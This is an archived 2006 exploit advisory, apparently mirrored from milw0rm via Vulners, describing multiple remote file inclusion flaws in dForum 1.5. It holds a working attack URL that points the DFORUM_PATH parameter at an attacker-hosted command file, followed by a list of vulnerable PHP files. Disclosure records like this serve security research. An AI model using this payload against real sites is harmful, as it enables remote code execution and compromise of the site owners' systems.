dForum 1.5 - 'DFORUM_PATH' Multiple Remote File Inclusions

🗓️ 21 Apr 2006 00:00:00Reported by nukedxType

dForum version 1.5 'DFORUM_PATH' Remote File Inclusions vulnerabilit

dForum <= 1.5 (DFORUM_PATH) Multiple Remote File Inclusion Vulnerabilities.
Method found by nukedx,
Contacts > ICQ: 10072 MSN/Mail: [email protected] web: www.nukedx.com
This exploit works on dForum <= 1.5
http://[victim]/[dForumPath]/[filename]?DFORUM_PATH=http://yourhost.com/cmd.txt?
Files ->
about.php
admin.php
anmelden.php
closethread.php
config.php
delpost.php
delthread.php
dfcode.php
download.php
editanoc.php
forum.php
login.php
makethread.php
menu.php
newthread.php
openthread.php
overview.php
post.php
suchen.php
user.php
userconfig.php
userinfo.php
verwalten.php
Original advisory: http://www.nukedx.com/?viewdoc=27
# nukedx.com [2006-04-21]

# milw0rm.com [2006-04-21]

21 Apr 2006 00:00Current

7.4High risk

Vulners AI Score7.4

dForum 1.5 - &#039;DFORUM_PATH&#039; Multiple Remote File Inclusions

dForum 1.5 - 'DFORUM_PATH' Multiple Remote File Inclusions